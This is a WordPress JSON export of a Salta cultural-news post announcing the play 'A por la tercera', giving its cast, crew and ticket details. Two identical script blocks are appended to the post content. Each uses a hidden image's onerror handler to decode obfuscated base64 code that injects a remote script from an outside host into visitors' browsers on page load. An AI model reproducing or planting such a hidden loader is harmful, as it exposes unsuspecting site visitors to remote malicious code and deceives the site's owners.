{"id":2787,"date":"2023-06-29T12:31:00","date_gmt":"2023-06-29T15:31:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2787"},"modified":"2025-08-14T00:14:00","modified_gmt":"2025-08-14T03:14:00","slug":"jueves-de-teatro-presenta-a-por-la-tercera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2787","title":{"rendered":"Jueves de Teatro presenta \u00abA por la tercera\u00bb"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a80c33\"><em>Hoy jueves 29 de junio a las 21:30 en la Casa de la Cultura<\/em><\/h3>\n\n\n\n<p>En el marco del ciclo anual \u00abJueves de Teatro\u00bb de La Casa de la Cultura de Salta, hoy\u00a0jueves 29 de junio se presenta \u201dA por la tercera\u201d, obra apta para adolescentes y adultos.<\/p>\n\n\n\n<p>Se trata de una residencia de ancianos de Madrid alberga el sue\u00f1o de cuatro ex milicianos republicanos de restaurar la Tercera Rep\u00fablica Espa\u00f1ola, a la muerte del Dictador Franco, removiendo historias y secretos del pasado y enfrentando con valent\u00eda las circunstancias del presente. Un entusiasmo juvenil idealista renace en ellos para dar paso a los acontecimientos intensos del 20 y 21 de noviembre de 1975. Un fondo hist\u00f3rico y dram\u00e1tico que, a su vez, recrea una circunstancia universal: una primavera que estalla en el oto\u00f1o de la vida.<\/p>\n\n\n\n<p>El elenco est\u00e1 conformado por Alejandro Frattini, Lucio Fern\u00e1ndez, Pablo Mercolli, Carlos Beriro, Eliana Rold\u00e1n y Pilar Broggini. Se presentar\u00e1 bajo la direcci\u00f3n de Cristina Idiarte.<\/p>\n\n\n\n<p><strong>Ficha t\u00e9cnica<\/strong><\/p>\n\n\n\n<p>Escenograf\u00eda: Alejandro Frattini<\/p>\n\n\n\n<p>Dise\u00f1o, vestuario y realizaci\u00f3n: Silvia Salinas Fresco<\/p>\n\n\n\n<p>Asistente de Direcci\u00f3n: Jorge Rueda<\/p>\n\n\n\n<p>Asistente de Escena: Sebasti\u00e1n Monz\u00f3n<\/p>\n\n\n\n<p>Producci\u00f3n General: Compa\u00f1\u00eda La Morisqueta<\/p>\n\n\n\n<p>Jueves 29 de junio &#8211; 21:30&nbsp;<\/p>\n\n\n\n<p>Casa de la Cultura \u2013 Caseros&nbsp;460<\/p>\n\n\n\n<p>Precio: $3.000. Entradas disponibles en boleter\u00eda de Casa de la Cultura, Caseros 460.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/jueves-de-teatro-presenta-a-por-la-tercera-90348\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy jueves 29 de junio a las 21:30 en la Casa de la Cultura En el marco del ciclo anual \u00abJueves de Teatro\u00bb de La Casa de la Cultura de Salta, hoy\u00a0jueves 29 de junio se presenta \u201dA por la tercera\u201d, obra apta para adolescentes y adultos. Se trata de una residencia de ancianos de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2788,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-2787","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2787"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2787"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2787\/revisions"}],"predecessor-version":[{"id":7043,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2787\/revisions\/7043"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2788"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}